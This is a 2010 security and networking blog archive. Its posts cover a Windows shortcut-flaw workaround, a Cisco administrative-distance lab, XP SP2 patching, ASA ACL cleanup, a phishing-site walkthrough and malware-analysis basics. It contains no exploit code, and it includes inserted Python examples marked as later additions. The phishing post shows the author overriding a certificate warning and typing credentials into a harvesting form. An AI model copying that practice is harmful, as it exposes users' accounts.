The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

Workaround:

Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

Disable the displaying of icons for shortcuts

Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe.

1. Click Start, click Run, type Regedit in the Open box, and then click OK
2. Locate and then click the following registry key:

HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler

3. Click the File menu and select Export
4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

Note This will create a backup of this registry key in the My Documents folder by default

5. Select the value (Default) in the right-hand window of the Registry Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
6. Restart explorer.exe or restart the computer.

Impact of workaround. Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

Disable the WebClient service

Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

To disable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Disabled. If the service is running, click Stop.
4. Click OK and exit the management application.

Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

How to undo the workaround.

To re-enable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Automatic. If the service is not running, click Start.
4. Click OK, and exit the management application.

This brings up the same concern I spoke about in this post: now that Microsoft is no longer supporting SP2, we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission-critical application, I think everyone should apply it.

References:

http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637


Jul 13 2010

Cisco Administrative Distance Manipulation – Part 1

Ok – “infolookup” has been asking for my contribution to his blog for quite some time now.  This is my first and hopefully not the last.

Recently I needed to meet a redundancy requirement on a Cisco router running both EIGRP and OSPF. The requirement was simple: favor the prefix learned via EIGRP and use the prefix learned via OSPF as a backup. I must also mention that the prefix is learned as an EIGRP external (D EX) route, which has an AD of 170, and as an OSPF external type 2 (O E2) route, which has an AD of 110, so by default the router prefers the OSPF path. In the first part of this article I will go through the setup of the lab, which closely simulates the scenario I had, and in the second part I will go through the actual remedy implemented that resulted in a “happy network”.

Let’s get to it.

First, let's go through the topology. This lab contains 5 routers, R0 – R4, as follows:

R0 = Representing a 3rd party network , who is advertising 198.200.230.0/24; 222.102.23.0/24; 0.0.0.0/0; 172.203.46.0/24

R1 = R0′s BGP peer / NAT point of our network / redistribution point of BGP to EIGRP

R2 = The Main router running EIGRP, RIP & OSPF (Think of this as the CORE of a particular site)

R3 = Router running RIP and OSPF. This provides a backup route towards one of the destinations available from R0 (222.102.23.0/24)

R4 = Router running OSPF. This provides a backup route towards one of the destinations available from R0  (198.200.230.0/24)

Please see Topology Diagram:

Administrative Distance Lab Topology

R0′s relevant configuration:

hostname R0
!
interface Loopback0
ip address 198.200.230.1 255.255.255.0
!
interface Loopback1
ip address 222.102.23.1 255.255.255.0
!
interface Loopback2
ip address 172.203.46.1 255.255.255.0
!
interface FastEthernet0/0
description FastE to R1
ip address 10.146.12.2 255.255.255.254
duplex auto
speed auto
!
router bgp 65000
no synchronization
bgp log-neighbor-changes
network 0.0.0.0
network 172.203.46.0 mask 255.255.255.0
network 198.200.230.0
network 222.102.23.0
neighbor R1-eBGP peer-group
neighbor R1-eBGP remote-as 65001
neighbor R1-eBGP route-map ROUTER-1-IN in
neighbor R1-eBGP route-map ROUTER-1-OUT out
neighbor 10.146.12.3 peer-group R1-eBGP
no auto-summary
!
ip route 0.0.0.0 0.0.0.0 Null0
!
ip prefix-list R1-IN seq 5 permit 172.32.27.0/24
!
ip prefix-list R1-OUT seq 5 permit 198.200.230.0/24
ip prefix-list R1-OUT seq 10 permit 222.102.23.0/24
ip prefix-list R1-OUT seq 15 permit 172.203.46.0/24
ip prefix-list R1-OUT seq 20 permit 0.0.0.0/0
!
route-map ROUTER-1-IN permit 10
match ip address prefix-list R1-IN
!
route-map ROUTER-1-OUT permit 10
match ip address prefix-list R1-OUT
!
Nothing fancy here, just basic BGP peering and prefix advertisement filters (in/outbound).

R1′s relevant configuration:

hostname R1
!
interface Loopback0
ip address 172.32.27.1 255.255.255.0
!
interface Loopback1
ip address 172.25.240.1 255.255.255.0
!
! 10.146.12.4/31 pairs with R2's 10.146.12.5 and 10.146.12.3/31 with R0's 10.146.12.2,
! so Fa0/0 is the R2 (NAT inside) side and Fa1/0 the R0 (NAT outside) side.
interface FastEthernet0/0
description FastE to R2
ip address 10.146.12.4 255.255.255.254
ip n​at inside
ip virtual-reassembly
duplex auto
speed auto
!
interface FastEthernet1/0
description FastE to R0
ip address 10.146.12.3 255.255.255.254
ip nat outside
ip virtual-reassembly
duplex auto
speed auto
!
router eigrp 200
redistribute bgp 65001 metric 1 1 1 1 1
network 10.146.12.4 0.0.0.0
network 172.25.240.1 0.0.0.0
no auto-summary
!
router bgp 65001
no synchronization
bgp log-neighbor-changes
network 172.32.27.0 mask 255.255.255.0
neighbor R0-eBGP peer-group
neighbor R0-eBGP remote-as 65000
neighbor R0-eBGP route-map ROUTER-0-OUT out
neighbor 10.146.12.2 peer-group R0-eBGP
no auto-summary
!
ip nat pool OVERLOAD 172.32.27.100 172.32.27.100 netmask 255.255.255.0
ip nat inside source list 10 pool OVERLOAD overload
!
ip prefix-list R0-OUT seq 5 permit 172.32.27.0/24
!
access-list 10 deny 10.146.12.3
access-list 10 permit any
!
route-map ROUTER-0-OUT permit 10
match ip address prefix-list R0-OUT
!

Not too fancy either: BGP-to-EIGRP redistribution, plus NAT on traffic matching ACL 10. Since R1 only advertises 172.32.27.0/24 to R0, without the NAT on R1 I wouldn't be able to ping R0's loopbacks from R4, for example.

R2′s relevant configuration:

hostname R2
!
interface FastEthernet0/0
ip address 10.146.12.5 255.255.255.254
duplex auto
speed auto
!
interface FastEthernet1/0
ip address 172.19.200.1 255.255.255.0
duplex auto
speed auto
!
router eigrp 200
redistribute ospf 100 metric 1 1 1 1 1
network 10.146.12.5 0.0.0.0
no auto-summary
!
router ospf 100
router-id 172.19.200.1
log-adjacency-changes
network 172.19.200.1 0.0.0.0 area 0
network 172.25.196.1 0.0.0.0 area 0
default-information originate always
!
router rip
version 2
network 172.19.0.0
no auto-summary
!

Probably the simplest of all the configs, but this is the key router on which we'll go through the Administrative Distance (AD) exercise. Not a lot to explain here either: OSPF is redistributed into EIGRP so that R1 learns the subnets from R3/R4 as well as the shared segment between R2, R3 and R4.

R3's relevant configuration:

hostname R3
!
!
interface Loopback1
ip address 11.12.13.1 255.255.252.0
!
interface Loopback2
ip address 14.15.16.1 255.255.252.0
!
interface Loopback3
ip address 201.200.200.2 255.255.255.0
!
interface Loopback4
ip address 199.199.199.1 255.255.255.0
!
interface FastEthernet0/0
ip address 172.19.200.2 255.255.255.0
duplex auto
speed auto
!
router ospf 100
router-id 172.19.200.2
log-adjacency-changes
network 11.12.13.1 0.0.0.0 area 0
network 14.15.16.1 0.0.0.0 area 0
network 172.19.200.2 0.0.0.0 area 0
distribute-list prefix DEFAULT-ONLY in
!
router rip
version 2
redistribute static
network 172.19.0.0
no auto-summary
!
ip route 222.102.23.0 255.255.255.0 Null0
!
!
ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0
!

A few things to note here. Although Lo1/2 and Fa0/0 are in OSPF, I only allow a default route (0.0.0.0/0) to be installed into the routing table from the OSPF process. Also note the static route to Null0: this is a lab after all, so instead of having a dummy host on the other side of an interface, I created the static route to Null0 so I can have a "live" static route to play with (i.e. "redistribute static" under RIP).

R4's relevant configuration:

hostname R4
!
interface Loopback1
ip address 199.20.46.1 255.255.254.0
!
interface Loopback2
ip address 198.22.12.1 255.255.254.0
!
interface FastEthernet0/0
ip address 172.19.200.3 255.255.255.0
duplex auto
speed auto
!
router ospf 100
router-id 172.19.200.3
log-adjacency-changes
redistribute static subnets
network 172.19.200.3 0.0.0.0 area 0
distribute-list prefix DEFAULT-ONLY in
!
ip route 198.200.230.0 255.255.255.0 Null0
!
!
ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0

A few things to note here. Much like R3, Lo1/2 and Fa0/0 are in OSPF, but I only allow a default route (0.0.0.0/0) to be installed into the routing table from the OSPF process. Also note the static route to Null0.

OK, enough configuration. Let's look at some show commands to verify that the network is up and running as we want, and also point out the behaviour that needs correcting, to be done in Part 2.


+++++++ R0
R0#sh ip bgp summary | b Neigh
Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd
10.146.12.3 4 65001 1677 1677 14 0 0 1d03h 1
R0#sh ip bgp neighbors 10.146.12.3 advertised-routes | b Net
Network Next Hop Metric LocPrf Weight Path
*> 0.0.0.0 0.0.0.0 0 32768 i
*> 172.203.46.0/24 0.0.0.0 0 32768 i
*> 198.200.230.0 0.0.0.0 0 32768 i
*> 222.102.23.0 0.0.0.0 0 32768 i
Total number of prefixes 4
R0#sh ip bgp | b Net
Network Next Hop Metric LocPrf Weight Path
*> 0.0.0.0 0.0.0.0 0 32768 i
*> 172.32.27.0/24 10.146.12.3 0 0 65001 i
*> 172.203.46.0/24 0.0.0.0 0 32768 i
*> 198.200.230.0 0.0.0.0 0 32768 i
*> 222.102.23.0 0.0.0.0 0 32768 i
R0#

+++++++ R1
R1#sh ip nat statistics
Total active translations: 0 (0 static, 0 dynamic; 0 extended)
Outside interfaces:
FastEthernet1/0
Inside interfaces:
FastEthernet0/0
Hits: 409 Misses: 8
CEF Translated packets: 181, CEF Punted packets: 16
Expired translations: 47
Dynamic mappings:
-- Inside Source
[Id: 1] access-list 10 pool OVERLOAD refcount 0
pool OVERLOAD: netmask 255.255.255.0
start 172.32.27.100 end 172.32.27.100
type generic, total addresses 1, allocated 0 (0%), misses 102
Appl doors: 0
Normal doors: 0
Queued Packets: 0
R1#

+++++++ R2

R2#sh ip route eigrp
172.203.0.0/24 is subnetted, 1 subnets
D EX 172.203.46.0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
172.25.0.0/24 is subnetted, 1 subnets
D 172.25.240.0 [90/156160] via 10.146.12.4, 1d05h, FastEthernet0/0
172.32.0.0/24 is subnetted, 1 subnets
D EX 172.32.27.0 [170/2560002816] via 10.146.12.4, 1d02h, FastEthernet0/0
D*EX 0.0.0.0/0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
R2#sh ip route ospf
O E2 198.200.230.0/24 [110/20] via 172.19.200.3, 1d02h, FastEthernet1/0
11.0.0.0/32 is subnetted, 1 subnets
O 11.12.13.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
14.0.0.0/32 is subnetted, 1 subnets
O 14.15.16.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
R2#sh ip route rip
R 222.102.23.0/24 [120/1] via 172.19.200.2, 00:00:16, FastEthernet1/0
R2#

+++++++ R3

R3#sh ip route ospf
O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
R3#sh ip rip database
172.19.0.0/16 auto-summary
172.19.200.0/24 directly connected, FastEthernet0/0
222.102.23.0/24 auto-summary
222.102.23.0/24 redistributed
[1] via 0.0.0.0,
R3#

+++++++ R4

R4#sh ip route ospf
O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
R4#

Below is the relevant output from R2, which shows that R2 is not using the EIGRP-learned routes to 222.102.23.0/24 and 198.200.230.0/24 but the OSPF and RIP routes instead. As mentioned earlier, the requirement for this scenario is that R2 use the EIGRP routes originated from R0, since they are the primary source. In Part 2, I'll go through the configuration added on R2 to make that happen. If you have ideas flowing through your head, please feel free to post a comment.

Until Next Time (AJ)


R2#sh ip route 222.102.23.1
Routing entry for 222.102.23.0/24
Known via "rip", distance 120, metric 1
Redistributing via rip
Last update from 172.19.200.2 on FastEthernet1/0, 00:00:11 ago
Routing Descriptor Blocks:
* 172.19.200.2, from 172.19.200.2, 00:00:11 ago, via FastEthernet1/0
Route metric is 1, traffic share count is 1
R2#sh ip route 198.200.230.0
Routing entry for 198.200.230.0/24
Known via "ospf 100", distance 110, metric 20, type extern 2, forward metric 1
Redistributing via eigrp 200
Advertised by eigrp 200 metric 1 1 1 1 1
Last update from 172.19.200.3 on FastEthernet1/0, 1d02h ago
Routing Descriptor Blocks:
* 172.19.200.3, from 172.19.200.3, 1d02h ago, via FastEthernet1/0
Route metric is 20, traffic share count is 1
R2#sh ip eigrp topology 222.102.23.0/24
IP-EIGRP (AS 200): Topology entry for 222.102.23.0/24
State is Passive, Query origin flag is 1, 0 Successor(s), FD is 4294967295
Routing Descriptor Blocks:
10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
Composite metric is (2560002816/2560000256), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 110 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 1
External data:
Originating router is 172.32.27.1
AS number of route is 65001
External protocol is BGP, external metric is 0
Administrator tag is 65000 (0x0000FDE8)
R2#sh ip eigrp topology 198.200.230.0/24
IP-EIGRP (AS 200): Topology entry for 198.200.230.0/24
State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560000256
Routing Descriptor Blocks:
172.19.200.3, from Redistributed, Send flag is 0x0
Composite metric is (2560000256/0), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 10 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 0
External data:
Originating router is 192.168.20.2 (this system)
AS number of route is 100
External protocol is OSPF, external metric is 20
Administrator tag is 0 (0x00000000)
10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
Composite metric is (2560002816/2560000256), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 110 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 1
External data:
Originating router is 172.32.27.1
AS number of route is 65001
External protocol is BGP, external metric is 0
Administrator tag is 65000 (0x0000FDE8)
R2#

+++++++ R1
R1#sh ip route eigrp
172.19.0.0/24 is subnetted, 1 subnets
D EX 172.19.200.0 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
11.0.0.0/32 is subnetted, 1 subnets
D EX 11.12.13.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
14.0.0.0/32 is subnetted, 1 subnets
D EX 14.15.16.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
R1#sh ip bgp neighbors 10.146.12.2 advertised-routes | b Net
Network Next Hop Metric LocPrf Weight Path
*> 172.32.27.0/24 0.0.0.0 0 32768 i
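To make the AD decision above concrete, here is an added example (not part of the original post) that models R2's route selection: the default ADs are Cisco's documented values, the candidate routes are constructed from the show output above, and the per-prefix override at the end is an assumed illustration of the effect we want, not the actual Part 2 fix.

```python
"""Route selection by administrative distance (AD), modelled on R2's tables.

Added example, not part of the original post. The default ADs are Cisco's
documented values; the candidate routes are constructed from the show output
above; the override at the end is an assumed illustration, not the Part 2 fix.
"""

# Cisco IOS default administrative distances (lower wins).
DEFAULT_AD = {
    "connected": 0, "static": 1, "ebgp": 20, "eigrp": 90, "ospf": 110,
    "rip": 120, "eigrp-external": 170, "ibgp": 200,
}

# What R2 has learned for the two prefixes, as (prefix, protocol, metric,
# next hop). Constructed from "sh ip route" and "sh ip eigrp topology" above.
R2_CANDIDATES = [
    ("222.102.23.0/24", "rip", 1, "172.19.200.2"),
    ("222.102.23.0/24", "eigrp-external", 2560002816, "10.146.12.4"),
    ("198.200.230.0/24", "ospf", 20, "172.19.200.3"),
    ("198.200.230.0/24", "eigrp-external", 2560002816, "10.146.12.4"),
]


def effective_ad(prefix, protocol, overrides):
    """AD for one candidate. A per-prefix override (what IOS 'distance' with
    an access-list gives you) beats a per-protocol override, which beats the
    default; None as the prefix key means 'every prefix of that protocol'."""
    if (protocol, prefix) in overrides:
        return overrides[(protocol, prefix)]
    return overrides.get((protocol, None), DEFAULT_AD[protocol])


def select_routes(candidates, overrides=None):
    """Return {prefix: (protocol, next_hop)} that the RIB would install.

    Only candidates for the same prefix compete. Lowest AD wins; metric is a
    tie-break that only makes sense within one protocol, so in practice you
    keep ADs distinct per protocol rather than relying on it.
    """
    overrides = overrides or {}
    best = {}
    for prefix, proto, metric, next_hop in candidates:
        key = (effective_ad(prefix, proto, overrides), metric)
        if prefix not in best or key < best[prefix][0]:
            best[prefix] = (key, proto, next_hop)
    return {p: (proto, nh) for p, (_key, proto, nh) in best.items()}


def r2_default():
    """Reproduces the behaviour shown above: RIP (120) and OSPF (110) both
    beat the EIGRP external route (170) even though R0 is the primary source."""
    return select_routes(R2_CANDIDATES)


def r2_with_prefix_override():
    """Assumed illustration: push only the RIP and OSPF copies of these two
    prefixes above 170 so the EIGRP external route from R0 wins, while every
    other RIP/OSPF route on R2 keeps its default AD."""
    overrides = {("rip", "222.102.23.0/24"): 171, ("ospf", "198.200.230.0/24"): 171}
    return select_routes(R2_CANDIDATES, overrides)


if __name__ == "__main__":
    print("default ADs:", r2_default())
    print("per-prefix override:", r2_with_prefix_override())
```

Note that the override is scoped to the two prefixes only; a blanket change to RIP or OSPF AD on R2 would also affect the default route and the R3/R4 loopbacks.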

Jul 13 2010

Patch Tuesday & XP SP2 end of life

In Microsoft's own words, Patch Tuesday is defined as: "When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often."

Now, in case you are wondering why I am choosing today of all days to talk about Patch Tuesday: today is significant because patches and support for XP SP2 officially end today. This might not seem like a big deal to a lot of people, but I know there are several companies that still run legacy software that is not supported on SP3 or above. So, in short, any new vulnerabilities discovered in the coming months or years will leave all those users exposed, just waiting to be exploited!

If you think that's bad, what if a vulnerability was reported to Microsoft years ago and never patched? Then those users could already have been exploited. A reference for this is a statement HD Moore made on Twitter today: "Almost four years later, Microsoft EOL's Windows XP SP2 without fixing the flaw I reported in 2006." HDM is the Chief Architect of the Metasploit project, which was created to provide information on exploit techniques and to build a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but if this exploit, and many more like it, were in the wrong hands, the sky's the limit.

So for anyone still using XP SP2, it's time to apply the patches below and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

  • MS10-042 (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
  • MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
  • MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
  • MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.

References:

http://www.microsoft.com/security/updates/bulletins/default.aspx

http://isc.sans.edu/diary.html?storyid=9166&rss

http://www.microsoft.com/security/updates/bulletins/201007.aspx

Jul 09 2010

Cleaning up your access list

As a network admin you soon realize, after a few months of adding various ACL rules, that there comes a time when you need to go back and consolidate those rules before they get out of hand.

Now that most cloud providers are moving away from the traditional TCP ports (80, 443) towards non-standard ports (8800, 3995), your job as a network admin requires a bit more planning.

Normally, if I get a call that a user is unable to access a certain website, I first verify whether it is a "URL filtering" issue or a "firewall" access issue. If I determine it is the latter, I write a typical ACL and grant the user access after the requested service has been tested.

For instance, if you receive a call about not being able to access website X on port 5454, you can write a basic ACL rule (a single user to a single site, so both ends are host entries):

access-list external_access extended permit tcp host 192.168.10.5 host 69.196.224.24 eq 5454

Now the above rule would work just fine, but think about it: if you receive 10-15 such requests a day, your firewall will be a mess after a while. The way to take care of this is by using network objects and groups in a rule.

Network objects let you predefine host and network IP addresses so that you can streamline subsequent configuration. When you configure the security policy, such as an access rule or an AAA rule, you can choose these predefined addresses instead of typing them in manually. Moreover, if you change the definition of an object, the change is inherited automatically by any rules using the object.

Below is how you would accomplish this if you received, say, three requests for web-related access, all on different ports:

======================================
Creating Object group and adding ports Cisco ASA Firewall
======================================

config t
object-group service External_Access tcp
description Access to external websites
port-object eq 7778
port-object eq 5454
port-object eq 3322

object-group network External_Access_Users
description Access to external websites
network-object host 192.168.10.5
network-object host 192.168.10.7
network-object host 192.168.10.9

=======================================
Creating ACL and applying object group
========================================
access-list acl_inside remark ***** External  Websites Access *****
access-list acl_inside extended permit tcp object-group External_Access_Users any object-group External_Access

Now the next time you receive a request for external website access on a non-standard port, you simply add the port to the service group and the host IP to the network group, and you are set. That's much easier on the eyes!

If you have another way of achieving the same outcome, don't hesitate to leave a comment; in the end it's all about learning.
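As an added example (not from the original post), here is a small script that does the consolidation described above mechanically: it parses one-off host/host/port rules of the shape shown earlier and emits the object-group configuration. The sample rules are constructed, and the group and ACL names are assumptions; unlike the hand-written version above, it keeps the destinations in their own group rather than widening them to "any".

```python
"""Turn a pile of one-off ASA host/host/port rules into object-groups.

Added example, not from the original post. The sample rules are constructed
in the shape of the one-off rule above; the group and ACL names are assumed.
"""
import re

# One-off rule shape: permit tcp host <src> host <dst> eq <port>.
RULE_RE = re.compile(
    r"access-list\s+(?P<acl>\S+)\s+extended\s+permit\s+tcp\s+"
    r"host\s+(?P<src>[\d.]+)\s+host\s+(?P<dst>[\d.]+)\s+eq\s+(?P<port>\d+)\s*$"
)

# Constructed sample: what a few days of tickets leave behind.
SAMPLE_RULES = [
    "access-list external_access extended permit tcp host 192.168.10.5 host 69.196.224.24 eq 5454",
    "access-list external_access extended permit tcp host 192.168.10.7 host 69.196.224.24 eq 7778",
    "access-list external_access extended permit tcp host 192.168.10.9 host 203.0.113.10 eq 3322",
]


def parse_rules(lines):
    """Return (sources, destinations, ports, skipped). Anything that is not a
    plain host/host/eq permit is reported in 'skipped' rather than silently
    folded in, so a 'permit ip any any' never hides inside a group rewrite."""
    srcs, dsts, ports, skipped = set(), set(), set(), []
    for line in lines:
        m = RULE_RE.match(line.strip())
        if m is None:
            skipped.append(line)
            continue
        srcs.add(m["src"])
        dsts.add(m["dst"])
        ports.add(int(m["port"]))
    return sorted(srcs), sorted(dsts), sorted(ports), skipped


def render_config(lines, acl="acl_inside", tag="External_Access"):
    """Emit ASA object-group config plus the single ACE that uses it.

    Trade-off to keep in mind: the grouped ACE permits every user to every
    site on every port (a cross product), which is wider than the sum of the
    original rules. Keeping destinations in their own group, instead of 'any'
    as in the hand-written version above, at least bounds that widening.
    """
    srcs, dsts, ports, skipped = parse_rules(lines)
    out = [f"object-group service {tag}_Ports tcp",
           " description Access to external websites"]
    out += [f" port-object eq {p}" for p in ports]
    out += [f"object-group network {tag}_Users", " description Users granted external access"]
    out += [f" network-object host {ip}" for ip in srcs]
    out += [f"object-group network {tag}_Sites", " description External websites"]
    out += [f" network-object host {ip}" for ip in dsts]
    out += [f"access-list {acl} remark ***** External Websites Access *****",
            f"access-list {acl} extended permit tcp object-group {tag}_Users "
            f"object-group {tag}_Sites object-group {tag}_Ports"]
    return "\n".join(out), skipped


if __name__ == "__main__":
    config, leftovers = render_config(SAMPLE_RULES)
    print(config)
    for line in leftovers:
        print("# not consolidated, review by hand:", line)
```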

Jul 08 2010

Yet another Phishing email

Today one of our faculty members forwarded an email to our help desk and asked us to take a look at it because it might be a phishing/spam email; you can only imagine how happy that made me. In the past we have had cases where people replied to these types of emails and received more spam in the process, or worse, gave their credentials away, but that was not the case today.

Below is an image of the email that was received today.

Fig-1 Phishing Email

Now the first thing I found funny about this email is that the phone number for tech support was an IP address. Maybe they overlooked that one or it was done out of humour; either way it set off some flags for me, and it should for anyone who receives an email like this.

Once I identified the email as a phishing attempt to harvest login credentials, I got curious and decided to load Firefox within Sandboxie and click the link in the email to see what it would do.

Fig-2 Firefox Untrusted Error

After clicking the link in the email I was redirected to www.eformit.com, which triggered a Firefox error because Firefox was unable to confirm that my connection to the site was secure. Since I wanted to see where the link would take me, I went ahead and added the certificate exception and continued. In general, if you ever get this error you should never add the certificate; instead, close your browser and do some research on the site in question.

Next I examined the server's SSL certificate and realized it had expired a few days earlier. That's another reason to conclude this site was bad business, but since I already knew that, I proceeded all the same.

Fig-3 Expired Cert

Now on to the next part of this journey: after clicking on the link I was taken to a website with a very contradictory notice, "we will never send emails to users requesting email account information", yet that's exactly what the page asks you to type in.

Fig-4 Credential harvesting form

Lastly, after filling in my email and password :), I was redirected to a parking page filled with cheap advertising, another sign of trouble.

Fig-5 Redirected page

Additional information courtesy of http://anubis.iseclab.org, a very useful source for analyzing uncertain files and URLs.

Fig-6 Additional network analysis information

In the end, it's always important to train your users to identify what a good or bad email looks like, and what your network policies are for these types of emails. Also, when in doubt, load up your sandbox and have some fun.

References

http://scanner.novirusthanks.org/

http://anubis.iseclab.org

http://www.sandboxie.com/

Jun 26 2010

Malware Analysis 101


A few months back I did a presentation on the topic of basic malware analysis; feel free to grab a copy of the slides –> Malware Analysis 101. The idea was to get across a few pointers on how to get started analyzing malware. I am by no means an expert on the subject; I only recently started doing some research in the area to try to understand what really happens to a system once it is infected with malware. I used materials from several sources and was also given some good pointers by Tim over at http://securitybraindump.blogspot.com/.

As a computer repair tech you normally don't have the luxury of studying an infection, since you are always on the clock and time literally means money. However, after seeing a certain trend of infections and having several repeat calls from some of my clients, I decided to take a step back: instead of just cleaning the infection, this time I copied the infected sample and started to analyze it.

During my analysis I basically narrowed it down to the following phases:

  • Phase one “System Baseline”
  • Phase two “Simple Execution”
  • Phase three “Review Changes”
  • Phase four “Tweaking/Using your tools”
  • Phase five "Lessons Learned"

I will do a follow-up post to this one, since I didn't show any of the detailed results from the demo portion of the slides. I am hoping to get some feedback on this post so I can revise my current process.
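As an added example (not from the slides or the original post), here is the core of phases one to three in code: take a baseline of a file tree, let the sample run, then diff the two snapshots to review what changed. It covers a directory rather than a whole system, and the "infection" is a constructed set of file edits in a temporary directory so it runs offline.

```python
"""Phases one to three above as code: baseline a tree, let the sample run,
review what changed. Added example, not from the slides; it covers a
directory rather than a whole system, and the 'infection' is a constructed
set of file edits in a temp dir so it runs offline.
"""
import hashlib
import os
import tempfile


def snapshot(root):
    """Map relative path -> (size, sha256) for every regular file under root.
    Symlinks are skipped so a planted link cannot make us hash something else."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = (os.path.getsize(full), digest)
    return snap


def diff_snapshots(before, after):
    """Return (added, removed, modified) lists of relative paths. Size and
    hash both count, so a same-size edit (e.g. to a hosts file) still shows."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return added, removed, modified


def _write(root, rel, data):
    """Helper for the constructed tree: write bytes to root/rel, creating dirs."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed run-through: baseline, 'execute', review changes."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "etc/hosts", b"127.0.0.1 localhost\n")
        _write(root, "var/log/app.log", b"ok\n")
        _write(root, "home/user/notes.txt", b"hello\n")
        before = snapshot(root)                      # phase one: baseline
        # Phase two stand-in: the kinds of change a review typically turns up,
        # a dropped file, an edited hosts file and a removed log.
        _write(root, "tmp/update.bin", b"\x00constructed sample\x00")
        _write(root, "etc/hosts", b"127.0.0.1 localhost\n0.0.0.0 updates.example\n")
        os.remove(os.path.join(root, "var", "log", "app.log"))
        after = snapshot(root)
        return diff_snapshots(before, after)         # phase three: review


if __name__ == "__main__":
    added, removed, modified = demo()
    print("added:", added, "\nremoved:", removed, "\nmodified:", modified)
```

On a real system you would snapshot the registry, services and autoruns the same way, and take the baseline from a clean image rather than from the machine you are about to infect.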
